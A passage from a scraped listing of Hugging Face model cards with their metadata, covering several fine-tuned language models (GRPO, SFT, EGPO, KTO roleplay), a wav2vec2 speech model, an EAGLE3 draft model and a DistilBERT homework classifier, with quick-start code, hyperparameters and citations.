generator = pipeline("text-generation", model="vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-1.0-mnt64-0922195515-epoch-8", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/zrl_csl_nlhf/nlhf/runs/6kinw4fn)
This model was trained with Extragradient, a method introduced in [Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback](https://huggingface.co/papers/2503.08942).
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0+cu128
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite Extragradient as:
```bibtex
@misc{zhou2025extragradientpreferenceoptimizationegpo,
title={Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback},
author={Runlong Zhou and Maryam Fazel and Simon S. Du},
year={2025},
eprint={2503.08942},
archivePrefix={arXiv},
primaryClass={cs.LG},
url={https://arxiv.org/abs/2503.08942},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
HaoranMS/DeepSeek-R1-Distill-Qwen-1.5B-dt_alpha0d01_topp0d5-0923
|
HaoranMS
| 2025-09-23T15:26:49Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen2",
"text-generation",
"generated_from_trainer",
"open-r1",
"conversational",
"dataset:data/open-s1",
"arxiv:2402.03300",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T15:24:17Z |
---
datasets: data/open-s1
library_name: transformers
tags:
- generated_from_trainer
- open-r1
licence: license
---
# Model Card for None
This model is a fine-tuned version of [None](https://huggingface.co/None) on the [data/open-s1](https://huggingface.co/datasets/data/open-s1) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/t-haorandang-ms/wandb_DeepSeek-R1-Distill-Qwen-1.5B/runs/au28winy)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.16.0
- Transformers: 4.50.0
- Pytorch: 2.5.1
- Datasets: 4.0.0
- Tokenizers: 0.21.2
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
sidhantoon/SubX2
|
sidhantoon
| 2025-09-23T15:26:16Z | 0 | 0 | null |
[
"safetensors",
"any-to-any",
"omega",
"omegalabs",
"bittensor",
"agi",
"license:mit",
"region:us"
] |
any-to-any
| 2025-09-23T15:11:00Z |
---
license: mit
tags:
- any-to-any
- omega
- omegalabs
- bittensor
- agi
---
This is an Any-to-Any model checkpoint for the OMEGA Labs x Bittensor Any-to-Any subnet.
Check out the [git repo](https://github.com/omegalabsinc/omegalabs-anytoany-bittensor) and find OMEGA on X: [@omegalabsai](https://x.com/omegalabsai).
|
atrost/math_sft_40K_trl_SFT_Regularized-0.7_Normalize-True
|
atrost
| 2025-09-23T15:26:03Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen3",
"text-generation",
"generated_from_trainer",
"sft",
"trl",
"conversational",
"base_model:Qwen/Qwen3-1.7B-Base",
"base_model:finetune:Qwen/Qwen3-1.7B-Base",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-19T15:49:43Z |
---
base_model: Qwen/Qwen3-1.7B-Base
library_name: transformers
model_name: math_sft_40K_trl_SFT_Regularized-0.7_Normalize-True
tags:
- generated_from_trainer
- sft
- trl
licence: license
---
# Model Card for math_sft_40K_trl_SFT_Regularized-0.7_Normalize-True
This model is a fine-tuned version of [Qwen/Qwen3-1.7B-Base](https://huggingface.co/Qwen/Qwen3-1.7B-Base).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="atrost/math_sft_40K_trl_SFT_Regularized-0.7_Normalize-True", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/astrost-university-of-wisconsin-madison/sft-regularized-sft/runs/lf39js1s)
This model was trained with SFT.
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
HamdanXI/Wav2vec2_MyST_Train_and_Dev
|
HamdanXI
| 2025-09-23T15:23:27Z | 7 | 0 |
transformers
|
[
"transformers",
"safetensors",
"wav2vec2",
"automatic-speech-recognition",
"generated_from_trainer",
"base_model:facebook/wav2vec2-base-960h",
"base_model:finetune:facebook/wav2vec2-base-960h",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] |
automatic-speech-recognition
| 2025-09-22T04:14:53Z |
---
library_name: transformers
license: apache-2.0
base_model: facebook/wav2vec2-base-960h
tags:
- generated_from_trainer
model-index:
- name: Wav2vec2_MyST_Train_and_Dev
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# Wav2vec2_MyST_Train_and_Dev
This model is a fine-tuned version of [facebook/wav2vec2-base-960h](https://huggingface.co/facebook/wav2vec2-base-960h) on an unknown dataset.
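A minimal inference sketch (assuming 16 kHz mono audio, which the wav2vec2 base checkpoint expects; the file path is a placeholder):

```python
from transformers import pipeline

asr = pipeline("automatic-speech-recognition", model="HamdanXI/Wav2vec2_MyST_Train_and_Dev")
print(asr("speech.wav")["text"])  # placeholder path to a 16 kHz mono WAV file
```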
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0003
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- gradient_accumulation_steps: 2
- total_train_batch_size: 16
- optimizer: AdamW (torch) with betas=(0.9, 0.999) and epsilon=1e-08; no additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 500
- num_epochs: 10
- mixed_precision_training: Native AMP
### Training results
### Framework versions
- Transformers 4.56.2
- Pytorch 2.3.1+cu121
- Datasets 4.1.1
- Tokenizers 0.22.1
|
Obaidreal/blockassist
|
Obaidreal
| 2025-09-23T15:23:08Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"bellowing durable tarantula",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-11T03:30:42Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- bellowing durable tarantula
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
HaoranMS/DeepSeek-R1-Distill-Qwen-1.5B-dt_alpha0d05_topp0d5-0923
|
HaoranMS
| 2025-09-23T15:20:22Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen2",
"text-generation",
"generated_from_trainer",
"open-r1",
"conversational",
"dataset:data/open-s1",
"arxiv:2402.03300",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T15:18:29Z |
---
datasets: data/open-s1
library_name: transformers
tags:
- generated_from_trainer
- open-r1
licence: license
---
# Model Card for None
This model is a fine-tuned version of [None](https://huggingface.co/None) on the [data/open-s1](https://huggingface.co/datasets/data/open-s1) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/t-haorandang-ms/wandb_DeepSeek-R1-Distill-Qwen-1.5B/runs/l7xcduys)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.16.0
- Transformers: 4.50.0
- Pytorch: 2.5.1
- Datasets: 4.0.0
- Tokenizers: 0.21.2
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
easiest-ai-shawn/Phi-4-EAGLE3-sharegpt-unfiltered
|
easiest-ai-shawn
| 2025-09-23T15:15:24Z | 0 | 1 | null |
[
"safetensors",
"llama",
"dataset:Aeala/ShareGPT_Vicuna_unfiltered",
"base_model:dddsaty/phi-4-GPTQ-8bit",
"base_model:finetune:dddsaty/phi-4-GPTQ-8bit",
"license:mit",
"region:us"
] | null | 2025-09-23T14:42:23Z |
---
license: mit
datasets:
- Aeala/ShareGPT_Vicuna_unfiltered
base_model:
- dddsaty/phi-4-GPTQ-8bit
- microsoft/phi-4
---
This is an EAGLE3 speculative-decoding draft model for use with Phi-4, trained on unfiltered ShareGPT example data using SpecForge.
Parameters:
- Epochs: 11
- Max Length: 4096
- TTT Length: 8
|
Frezer02/retrained_llama32-1bn-finetuned
|
Frezer02
| 2025-09-23T15:15:11Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"llama",
"trl",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:15:00Z |
---
base_model: unsloth/llama-3.2-1b-instruct-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** Frezer02
- **License:** apache-2.0
- **Finetuned from model:** unsloth/llama-3.2-1b-instruct-unsloth-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
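A minimal loading sketch with Unsloth (the sequence length and 4-bit flag below are illustrative assumptions, not settings confirmed by this card):

```python
from unsloth import FastLanguageModel

model, tokenizer = FastLanguageModel.from_pretrained(
    model_name="Frezer02/retrained_llama32-1bn-finetuned",
    max_seq_length=2048,   # assumption
    load_in_4bit=True,     # assumption; matches the bnb-4bit base model
)
FastLanguageModel.for_inference(model)  # enable fast inference mode
```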
|
Delta-Vector/Austral-4.5B-Winton
|
Delta-Vector
| 2025-09-23T15:14:54Z | 35 | 6 |
transformers
|
[
"transformers",
"safetensors",
"arcee",
"text-generation",
"roleplay",
"finetune",
"axolotl",
"adventure",
"creative-writing",
"GLM4",
"32B",
"conversational",
"en",
"dataset:Delta-Vector/Tauri-Rep-Remover-KTO",
"dataset:Delta-Vector/Orion-LN-V1-ShareGPT",
"dataset:Delta-Vector/Orion-Personamaxx-RP",
"dataset:Delta-Vector/Orion-Co-Writer-51K",
"dataset:Delta-Vector/Orion-Praxis-Co-Writer",
"dataset:Delta-Vector/Orion-Shoujo-AI-Filtered-ShareGPT",
"dataset:Delta-Vector/Orion-PIPPA-Cleaned-V2",
"dataset:Delta-Vector/Orion-Alpindale-LN-ShareGPT",
"dataset:Delta-Vector/Orion-Deepseek-V3-RP-Filtered",
"dataset:Delta-Vector/Orion-Books-V2-ShareGPT",
"dataset:Delta-Vector/Orion-Light-Novels-Roleplay-Logs-Books-Oh-My-duplicate-turns-removed",
"dataset:Delta-Vector/Orion-RP-Guild",
"dataset:Delta-Vector/Orion-Creative_Writing-Complexity",
"dataset:Delta-Vector/Orion-Deepseek-R1-RP-Filtered",
"dataset:Delta-Vector/Orion-Storium-Prefixed-Clean",
"dataset:Delta-Vector/Orion-Misc-Sharegpt-Prefixed",
"dataset:Delta-Vector/Orion-LIMARP-Complexity",
"dataset:Delta-Vector/Orion-BlueSky-10K-Complexity",
"dataset:Delta-Vector/Orion-OpenCAI-ShareGPT",
"dataset:Delta-Vector/Orion-Roleplay-Logs-Sharegpt-Ngram-cleaned",
"dataset:Delta-Vector/Orion-vanilla-backrooms-claude-sharegpt",
"base_model:Delta-Vector/Austral-AFM-SFT",
"base_model:finetune:Delta-Vector/Austral-AFM-SFT",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-17T22:32:04Z |
---
license: apache-2.0
base_model:
- Delta-Vector/Austral-AFM-SFT
language:
- en
library_name: transformers
tags:
- roleplay
- finetune
- axolotl
- adventure
- creative-writing
- GLM4
- 32B
datasets:
- Delta-Vector/Tauri-Rep-Remover-KTO
- Delta-Vector/Orion-LN-V1-ShareGPT
- Delta-Vector/Orion-Personamaxx-RP
- Delta-Vector/Orion-Co-Writer-51K
- Delta-Vector/Orion-Praxis-Co-Writer
- Delta-Vector/Orion-Shoujo-AI-Filtered-ShareGPT
- Delta-Vector/Orion-PIPPA-Cleaned-V2
- Delta-Vector/Orion-Alpindale-LN-ShareGPT
- Delta-Vector/Orion-Deepseek-V3-RP-Filtered
- Delta-Vector/Orion-Books-V2-ShareGPT
- >-
Delta-Vector/Orion-Light-Novels-Roleplay-Logs-Books-Oh-My-duplicate-turns-removed
- Delta-Vector/Orion-RP-Guild
- Delta-Vector/Orion-Creative_Writing-Complexity
- Delta-Vector/Orion-Deepseek-R1-RP-Filtered
- Delta-Vector/Orion-Storium-Prefixed-Clean
- Delta-Vector/Orion-Misc-Sharegpt-Prefixed
- Delta-Vector/Orion-LIMARP-Complexity
- Delta-Vector/Orion-BlueSky-10K-Complexity
- Delta-Vector/Orion-OpenCAI-ShareGPT
- Delta-Vector/Orion-Roleplay-Logs-Sharegpt-Ngram-cleaned
- Delta-Vector/Orion-vanilla-backrooms-claude-sharegpt
---
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Austral 4.5B Winton</title>
<link href="" rel="stylesheet">
<style>
body {
font-family: 'Roboto Slab', serif;
background: linear-gradient(135deg, #8B4513 0%, #A0522D 25%, #CD853F 50%, #D2691E 75%, #8B4513 100%);
background-size: 400% 400%;
animation: prehistoricShift 20s ease-in-out infinite;
color: #2F1B14;
margin: 0;
padding: 0;
font-size: 16px;
min-height: 100vh;
}
@keyframes prehistoricShift {
0%, 100% { background-position: 0% 50%; }
50% { background-position: 100% 50%; }
}
.container {
margin: 20px;
background: linear-gradient(145deg, #F4E4BC 0%, #DEB887 100%);
padding: 20px;
border-radius: 15px;
box-shadow: 0 8px 25px rgba(0, 0, 0, 0.4), inset 0 2px 5px rgba(255, 255, 255, 0.3);
border: 4px solid #8B4513;
position: relative;
overflow: hidden;
}
.container::before {
content: '';
position: absolute;
top: 0;
left: 0;
right: 0;
bottom: 0;
background-image:
radial-gradient(circle at 20% 80%, rgba(139, 69, 19, 0.1) 0%, transparent 50%),
radial-gradient(circle at 80% 20%, rgba(160, 82, 45, 0.1) 0%, transparent 50%);
pointer-events: none;
}
.header h1 {
font-family: 'Cinzel', serif;
font-size: 32px;
color: #5D2E0C;
margin: 0 0 20px 0;
text-align: center;
text-shadow: 2px 2px 4px rgba(0, 0, 0, 0.3);
letter-spacing: 2px;
position: relative;
}
.section {
margin-top: 30px;
position: relative;
}
.section h2 {
font-family: 'Cinzel', serif;
font-size: 26px;
color: #5D2E0C;
text-align: center;
margin-bottom: 20px;
text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.2);
letter-spacing: 1px;
}
.info p {
color: #2F1B14;
line-height: 1.7;
font-size: 16px;
text-shadow: 0 1px 1px rgba(255, 255, 255, 0.5);
}
.info img {
width: 85%;
border-radius: 12px;
margin: 0 auto 15px;
display: block;
box-shadow: 0 0 25px rgba(0, 0, 0, 0.4);
border: 3px solid #8B4513;
filter: sepia(20%) contrast(110%);
}
a {
color: #5D2E0C;
text-decoration: none;
transition: all 0.3s ease;
font-weight: 500;
}
a:hover {
color: #8B4513;
text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.2);
}
.button {
display: inline-block;
background: linear-gradient(145deg, #CD853F, #D2691E);
color: #2F1B14;
padding: 12px 24px;
border-radius: 8px;
cursor: pointer;
text-decoration: none;
transition: all 0.3s ease;
box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
border: 2px solid #8B4513;
}
.button:hover {
background: linear-gradient(145deg, #D2691E, #CD853F);
box-shadow: 0 6px 15px rgba(139, 69, 19, 0.4);
transform: translateY(-2px);
}
pre {
background: linear-gradient(145deg, #F5DEB3, #DEB887);
padding: 20px;
border-radius: 8px;
overflow-x: auto;
border: 2px solid #8B4513;
box-shadow: inset 0 2px 5px rgba(0, 0, 0, 0.1);
}
code {
font-family: 'Courier New', monospace;
color: #2F1B14;
}
.info-card {
background: linear-gradient(145deg, #F5DEB3, #DEB887);
border: 3px solid #8B4513;
border-radius: 12px;
overflow: hidden;
box-shadow: 0 6px 15px rgba(0, 0, 0, 0.2);
}
.info-header {
background: linear-gradient(145deg, #CD853F, #D2691E);
padding: 25px;
border-bottom: 2px solid #8B4513;
}
.info-header h3 {
font-family: 'Cinzel', serif;
color: #2F1B14;
margin: 0 0 15px 0;
font-size: 22px;
text-align: center;
text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.2);
letter-spacing: 1px;
}
.model-tags {
display: flex;
gap: 10px;
flex-wrap: wrap;
justify-content: center;
}
.model-tag {
background: linear-gradient(145deg, #DEB887, #CD853F);
color: #2F1B14;
padding: 6px 12px;
border-radius: 6px;
font-size: 12px;
border: 2px solid #8B4513;
font-weight: 500;
box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
}
.model-composition {
padding: 25px;
border-bottom: 2px solid #8B4513;
}
.model-composition h4 {
font-family: 'Cinzel', serif;
color: #5D2E0C;
margin: 0 0 20px 0;
font-size: 18px;
text-align: center;
letter-spacing: 1px;
}
.composition-list {
list-style: none;
padding: 0;
margin: 0;
display: grid;
gap: 15px;
}
.composition-list li {
color: #2F1B14;
display: flex;
align-items: baseline;
gap: 12px;
padding: 10px;
background: rgba(245, 222, 179, 0.5);
border-radius: 6px;
border-left: 4px solid #8B4513;
}
.model-component {
font-weight: 600;
min-width: 120px;
}
.model-description {
padding: 25px;
background: linear-gradient(145deg, #F5DEB3, #F4E4BC);
}
.metrics-section {
margin-bottom: 30px;
}
.metrics-section details {
background: linear-gradient(145deg, #F5DEB3, #DEB887);
border: 3px solid #8B4513;
border-radius: 10px;
padding: 20px;
margin-bottom: 20px;
box-shadow: 0 4px 10px rgba(0, 0, 0, 0.2);
}
.metrics-section summary {
font-family: 'Cinzel', serif;
color: #5D2E0C;
font-size: 18px;
cursor: pointer;
outline: none;
padding: 10px 0;
text-align: center;
font-weight: 500;
letter-spacing: 1px;
}
.creator-section {
margin: 25px 0;
text-align: center;
}
.creator-badge {
display: inline-flex;
align-items: center;
background: linear-gradient(145deg, #CD853F, #D2691E);
border: 3px solid #8B4513;
border-radius: 10px;
padding: 15px 20px;
box-shadow: 0 4px 10px rgba(0, 0, 0, 0.2);
}
.creator-label {
color: #2F1B14;
font-size: 14px;
margin-right: 10px;
font-weight: 500;
}
.creator-link {
display: flex;
align-items: center;
gap: 8px;
color: #2F1B14;
text-decoration: none;
transition: all 0.3s ease;
}
.creator-name {
font-weight: 600;
}
.creator-arrow {
font-size: 16px;
transition: transform 0.3s ease;
}
.creator-link:hover .creator-arrow {
transform: translateX(5px);
}
.link-arrow {
display: inline-block;
transition: transform 0.3s ease;
}
a:hover .link-arrow {
transform: translateX(3px);
}
.axolotl-container {
text-align: center;
margin: 35px 0;
}
.axolotl-container img {
max-width: 300px;
border-radius: 10px;
box-shadow: 0 6px 15px rgba(0, 0, 0, 0.3);
border: 3px solid #8B4513;
filter: sepia(30%) contrast(110%);
}
.fossil-texture {
position: relative;
}
.fossil-texture::after {
content: '';
position: absolute;
top: 0;
left: 0;
right: 0;
bottom: 0;
background-image:
radial-gradient(circle at 25% 25%, rgba(139, 69, 19, 0.05) 2px, transparent 2px),
radial-gradient(circle at 75% 75%, rgba(160, 82, 45, 0.05) 1px, transparent 1px);
background-size: 50px 50px, 30px 30px;
pointer-events: none;
}
</style>
</head>
<body>
<div class="container fossil-texture">
<div class="header">
<h1>Austral 4.5B Winton</h1>
</div>
<div class="info">
<img src="https://cdn-uploads.huggingface.co/production/uploads/66c26b6fb01b19d8c3c2467b/jxUvuFK1bdOdAPiYIcBW5.jpeg" alt="Model banner">
<div style="text-align: center;">
<div class="creator-section">
<div class="creator-badge">
<span class="creator-label">Trained by</span>
<a href="https://huggingface.co/Delta-Vector" target="_blank" class="creator-link">
<span class="creator-name">Delta-Vector</span>
</a>
</div>
</div>
<div class="model-info">
<h2>Overview</h2>
<div class="info-card">
<div class="info-header">
<h3>Austral 4.5B - Winton</h3>
<div class="model-tags">
<span class="model-tag">AFM-Based</span>
<span class="model-tag">KTO enhanced</span>
<span class="model-tag">Adventure/Roleplay generalist</span>
<span class="model-tag">4.5B Sized model</span>
</div>
</div>
<div class="model-description">
<p style="font-weight: bold; font-style: italic;">More than 1.5 metres tall, about six metres long and up to 1,000 kilograms in weight, Australovenator wintonensis was a fast and agile hunter. The largest known Australian theropod.</p>
<p>This is a finetune of arcee-ai/AFM-4.5B to be a generalist Roleplay/Adventure model. It was a multi-stage finetune (SFT->KTO). In testing it has shown to be a great model for Adventure cards & Roleplay, often pushing the plot forward better than other models while avoiding some of the slop you'd find in models from Drummer and Co. It also has enhanced knowledge of roleplaying domains compared to the base.</p>
<p>Support my finetunes / me on Ko-fi: https://Ko-fi.com/deltavector | Thank you to Auri/Joe for helping/testing ♥</p>
</div>
</div>
</div>
<div class="section">
<h2>Quants</h2>
<div class="info-card">
<div class="model-composition">
<h4>Quants Formats</h4>
<ul class="composition-list">
<li><span class="model-component"><a href="https://huggingface.co/mradermacher/Austral-4.5B-Winton-GGUF" target="_blank">GGUF</a></span>For use with LLama.cpp & Forks(Thanks Mradermacher!)</li>
<li><span class="model-component"><a href="" target="_blank">EXL3</a></span>For use with TabbyAPI(Coming soon!)</li>
</ul>
</div>
</div>
</div>
<div class="section">
<h2>Chat Format</h2>
<p>This model utilizes ChatML.</p>
<pre><code><|im_start|>user
Hi there!<|im_end|>
<|im_start|>assistant
Nice to meet you!<|im_end|>
<|im_start|>user
Can I ask a question?<|im_end|>
<|im_start|>assistant</code></pre>
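<p>As a quick sketch, the same turns can be rendered programmatically with the tokenizer's chat template. This assumes the released tokenizer ships a ChatML template, and the repo id below is a hypothetical guess based on this card's name:</p>
<pre><code>from transformers import AutoTokenizer

# Hypothetical repo id for this card.
tok = AutoTokenizer.from_pretrained("Delta-Vector/Austral-4.5B-Winton")
messages = [
    {"role": "user", "content": "Hi there!"},
    {"role": "assistant", "content": "Nice to meet you!"},
    {"role": "user", "content": "Can I ask a question?"},
]
# Renders the ChatML string shown above, ending with the assistant header.
print(tok.apply_chat_template(messages, tokenize=False, add_generation_prompt=True))</code></pre>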
</div>
<div class="section">
<h2>Training</h2>
<p>This model was trained over 4 epochs on 8 x 3090s for the base SFT; I then ran KTO for 1 epoch to clean up some coherency issues. Total time was roughly 8 hours.</p>
<p style="text-align: center; margin-top: 20px;">
<div class="axolotl-container">
<a href="https://github.com/OpenAccess-AI-Collective/axolotl" target="_blank">
<img src="https://raw.githubusercontent.com/OpenAccess-AI-Collective/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl">
</a>
</div>
<div class="section">
<h2>Credits</h2>
<p>TYSM to my friends: Auri, Minh, Trappu, Alicat, Kubernetes Bad, Intervitens, NyxKrage & Kalomaze</p>
</div>
</div>
</div>
</div>
</div>
</body>
</html>
|
george2cool36/hw2_text_finetune_distilbert
|
george2cool36
| 2025-09-23T15:12:32Z | 7 | 0 |
transformers
|
[
"transformers",
"safetensors",
"distilbert",
"text-classification",
"finetuned",
"homework",
"dataset:ddecosmo/hw_text_dataset",
"license:mit",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-22T15:00:37Z |
---
license: mit
tags:
- text-classification
- distilbert
- finetuned
- homework
library_name: transformers
datasets:
- ddecosmo/hw_text_dataset
---
# DistilBERT fine-tuned — HW2 Text
## Task
Fine-tuned **DistilBERT** for text classification on a classmate's HW1 dataset.
- Dataset: `ddecosmo/hw_text_dataset`
- Text column: `Text`
- Label column: `label` (classes: ['asu', 'bucknell', 'cmu', 'duq', 'ucsd', 'uscd'])
- Train/Eval split: 80/20 (stratified if available)
## Training
- Base model: `distilbert-base-uncased`
- Epochs: 3, LR=5e-5, WD=0.01, warmup=10%
- Batch size: 16
- Best model by: F1 (macro)
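## Usage
A minimal inference sketch (the repo id is this model's; the example sentence is hypothetical):
```python
from transformers import pipeline

# Text-classification pipeline over the fine-tuned checkpoint; the config's
# label mapping (see Notes below) turns logits into school names.
clf = pipeline("text-classification", model="george2cool36/hw2_text_finetune_distilbert")

print(clf("The campus sits in Pittsburgh and is known for robotics."))
```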
## Results (Test)
- Accuracy: 0.4000
- F1 (macro): 0.1231
- Precision (macro): nan
- Recall (macro): nan
## Notes & Limitations
- Small student dataset; results may vary with seeds.
- Labels mapped as: {'asu': 0, 'bucknell': 1, 'cmu': 2, 'duq': 3, 'ucsd': 4, 'uscd': 5}
## AI Tool Disclosure
This notebook used ChatGPT for scaffolding code and documentation.
All dataset selection, training, evaluation, and uploads were performed by the student.
|
Youseff1987/qwen-3-4b-instruct-2507-translate-2509-merged
|
Youseff1987
| 2025-09-23T15:12:13Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen3",
"text-generation",
"text-generation-inference",
"unsloth",
"conversational",
"en",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T15:09:14Z |
---
base_model: unsloth/qwen3-4b-instruct-2507-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
license: apache-2.0
language:
- en
---
# Uploaded finetuned model
- **Developed by:** Youseff1987
- **License:** apache-2.0
- **Finetuned from model:** unsloth/qwen3-4b-instruct-2507-bnb-4bit
This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
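A minimal generation sketch with standard `transformers` usage. The translation-style prompt is hypothetical (chosen to match the "translate" hint in the repo name), and `device_map="auto"` assumes `accelerate` is installed:
```python
from transformers import AutoModelForCausalLM, AutoTokenizer

repo = "Youseff1987/qwen-3-4b-instruct-2507-translate-2509-merged"
tokenizer = AutoTokenizer.from_pretrained(repo)
model = AutoModelForCausalLM.from_pretrained(repo, torch_dtype="auto", device_map="auto")

# Hypothetical translation-style prompt; adjust to your task.
messages = [{"role": "user", "content": "Translate to English: Guten Morgen, wie geht es dir?"}]
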